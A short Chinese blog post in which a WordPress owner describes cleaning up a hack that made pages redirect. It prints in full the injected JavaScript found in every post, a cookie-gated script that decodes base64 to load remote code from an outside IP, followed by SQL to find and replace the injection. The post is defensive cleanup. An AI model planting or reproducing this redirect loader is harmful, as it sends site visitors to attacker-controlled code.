最近网络攻击太猖狂了,我的网站被黑了一段时间了有。现象就是访问的页面会自动跳转到其他网站。
期间还搞了想迁移到docker中去,也搞上去了,但还是心有不甘啊!折腾一晚上终于:
一,通过exploit scanner插件扫可疑的代码:
每篇文章中都被恶意植入了代码:
<!–codes_iframe–><script type=”text/javascript”> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘<script src=”‘+src+'”><\/script>’)} </script><!–/codes_iframe–>
二、数据库查找:
select * from wp_posts where post_content like ‘%被注入的内容%’;
三、数据库删除:
UPDATE wp_posts SET post_content = replace(post_content, ‘被注入的内容‘, ‘fuck’);
四、做好安全!
巴拉巴拉巴拉……